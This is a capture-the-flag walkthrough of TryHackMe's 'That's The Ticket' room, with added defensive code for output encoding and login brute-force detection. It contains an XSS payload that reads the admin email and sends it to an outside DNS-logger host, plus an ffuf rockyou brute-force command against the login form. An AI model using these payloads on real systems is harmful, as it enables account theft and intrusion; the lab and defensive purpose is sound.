This is a write-up/walkthrough of the room That’s The Ticket from TryHackMe.
First of all, we run an Nmap scan:
~ nmap -sC -sV -oN initial.nmap $IP
We get the following results:
If we visit the website we see the following:
Click on register and create an account.
We then get taken to this dashboard:
We can try basic XSS in the ticket input:
This works and we get the following:
DNS and HTTP Logger
If we go back to TryHackMe, we see that it is recommending the HTTP & DNS Logging tool on http://10.10.10.100.
We can now use the following XSS payload:
Getting the admin email
We can use the following XSS payload (the statements are split onto separate lines and terminated with semicolons so the script parses; the original had them run together):
</textarea>
<script>
var email = document.getElementById("email").innerText;
email = email.replace("@", "aaa");
email = email.replace(".", "ooo");
document.location = "http://" + email + ".6df3160f18c599e89ea88cfb89e13ee8.log.tryhackme.tech";
</script>
And we will receive the following request:
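Both payloads above work for the same reason: the ticket body is written straight into a textarea without encoding, so a closing </textarea> tag ends the element and everything after it is parsed as markup. The following is an added example, not the room's code; the ticket object and the two render helpers are assumed. It shows that vulnerable rendering next to a version that HTML-encodes every untrusted field before interpolation, which is the application-side fix (the same injection point is what the DNS-logger exfiltration relies on, so encoding closes both).

```javascript
// Added example (not from the walkthrough): output encoding that stops the
// </textarea> breakout used in the room. Framework-agnostic; renderTicket*
// and the ticket shape are assumed helpers, not the room's application.

// Map every HTML-significant character to its entity. Escaping '<' alone is
// enough to keep "</textarea>" from closing the element, but the full set
// also protects attribute contexts elsewhere in the page.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering: the ticket body is concatenated straight into the
// response, so a body containing </textarea> ends the element and the rest
// is parsed as markup. This mirrors the behaviour the room exploits.
function renderTicketVulnerable(ticket) {
  return `<h2>${ticket.title}</h2>\n<textarea readonly>${ticket.body}</textarea>`;
}

// Hardened rendering: every untrusted field is escaped for the HTML body
// context before interpolation, so the browser only ever sees text.
function renderTicketSafe(ticket) {
  return `<h2>${escapeHtml(ticket.title)}</h2>\n<textarea readonly>${escapeHtml(ticket.body)}</textarea>`;
}

// Crude check: does the rendered markup contain a script start tag?
// (A real test would parse the DOM; a regex is enough to show the point.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// How many times the textarea is closed; more than one means a breakout.
function countTextareaCloses(html) {
  return (html.match(/<\/textarea>/gi) || []).length;
}

// Constructed sample ticket shaped like the room's payload, with the script
// body reduced to alert(1); the breakout mechanism is identical.
const sampleTicket = {
  title: "Printer broken",
  body: "</textarea><script>alert(1)</script>",
};

console.log(renderTicketVulnerable(sampleTicket));
console.log(renderTicketSafe(sampleTicket));
```

A Content-Security-Policy that disallows inline scripts is worth adding as defence in depth, but encoding on output is the change that actually removes the bug.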
Getting the admin password
We can get the admin password by brute-forcing the login form with ffuf and the rockyou wordlist; -fw 475 filters out the responses whose word count matches a failed login, so only a different (successful) response is shown:
ffuf -w /usr/share/wordlists/rockyou.txt -d "email=<ADMINEMAIL>&password=FUZZ" -u http://$IP/login -fw 475 -H "Content-Type: application/x-www-form-urlencoded"
This reveals the admin password, which we can log in with.
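From the server side, a run like that is very visible: one client hammering POST /login and getting back the same status and body size every time, which is exactly the constant word count the -fw filter keys on. The following is an added detection example, not part of the walkthrough; the access-log lines, IP addresses, timestamps and the 20-attempts-per-60-seconds threshold are all constructed.

```javascript
// Added example, not part of the walkthrough: detect a login brute-force like
// the ffuf run above from web-server access logs (common log format).
// Log lines, IP addresses, timestamps and thresholds are constructed.

const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)/;
const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5,
                 Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };

// "10/Oct/2023:13:55:36 +0000" -> epoch seconds. Offsets other than +0000
// are ignored, which is fine for the constructed sample.
function parseClfTime(s) {
  const m = /^(\d{2})\/(\w{3})\/(\d{4}):(\d{2}):(\d{2}):(\d{2})/.exec(s);
  if (!m) return null;
  return Date.UTC(+m[3], MONTHS[m[2]], +m[1], +m[4], +m[5], +m[6]) / 1000;
}

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], ts: parseClfTime(m[2]), method: m[3], path: m[4],
           status: +m[5], bytes: m[6] === "-" ? 0 : +m[6] };
}

// Flag clients that POST to the login endpoint more than `threshold` times in
// any `windowSec` window. A failed login comes back with the same status and
// body size every time, so a long run of identical responses ending in a
// different one is the signature of a dictionary attack that succeeded.
function detectLoginBruteForce(logText, { loginPath = "/login", threshold = 20, windowSec = 60 } = {}) {
  const byIp = new Map();
  for (const raw of logText.split("\n")) {
    const e = parseLine(raw.trim());
    if (!e || e.method !== "POST" || e.path !== loginPath) continue;
    if (!byIp.has(e.ip)) byIp.set(e.ip, []);
    byIp.get(e.ip).push(e);
  }
  const findings = [];
  for (const [ip, events] of byIp) {
    events.sort((a, b) => a.ts - b.ts);
    // Largest number of attempts inside any sliding window of windowSec.
    let maxInWindow = 0;
    for (let start = 0, end = 0; end < events.length; end++) {
      while (events[end].ts - events[start].ts > windowSec) start++;
      maxInWindow = Math.max(maxInWindow, end - start + 1);
    }
    if (maxInWindow <= threshold) continue;
    // The most common response shape is the "wrong password" page.
    const shapeCounts = new Map();
    for (const e of events) {
      const k = `${e.status}:${e.bytes}`;
      shapeCounts.set(k, (shapeCounts.get(k) || 0) + 1);
    }
    const dominant = [...shapeCounts.entries()].sort((a, b) => b[1] - a[1])[0][0];
    const last = events[events.length - 1];
    findings.push({
      ip,
      attempts: events.length,
      maxInWindow,
      possibleSuccess: `${last.status}:${last.bytes}` !== dominant,
    });
  }
  return findings;
}

// Constructed sample: 25 identical failures from one client one second apart,
// then a redirect (the guess that worked), with unrelated traffic mixed in.
function constructedLog() {
  const lines = [];
  for (let i = 0; i < 25; i++) {
    const sec = String(10 + i).padStart(2, "0");
    lines.push(`10.0.0.5 - - [10/Oct/2023:13:55:${sec} +0000] "POST /login HTTP/1.1" 200 3201`);
  }
  lines.push(`10.0.0.7 - - [10/Oct/2023:13:55:20 +0000] "GET /dashboard HTTP/1.1" 200 5120`);
  lines.push(`10.0.0.7 - - [10/Oct/2023:13:55:21 +0000] "POST /login HTTP/1.1" 200 3201`);
  lines.push(`10.0.0.5 - - [10/Oct/2023:13:55:35 +0000] "POST /login HTTP/1.1" 302 0`);
  return lines.join("\n");
}

console.log(detectLoginBruteForce(constructedLog()));
// → [ { ip: '10.0.0.5', attempts: 26, maxInWindow: 26, possibleSuccess: true } ]
```

The same counting logic, applied per account rather than per source IP, is what a lockout or rate limit on the login route would enforce; doing it on the server removes the attack rather than just reporting it.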
We can then read ticket 1 to get the flag!
And that is the room complete!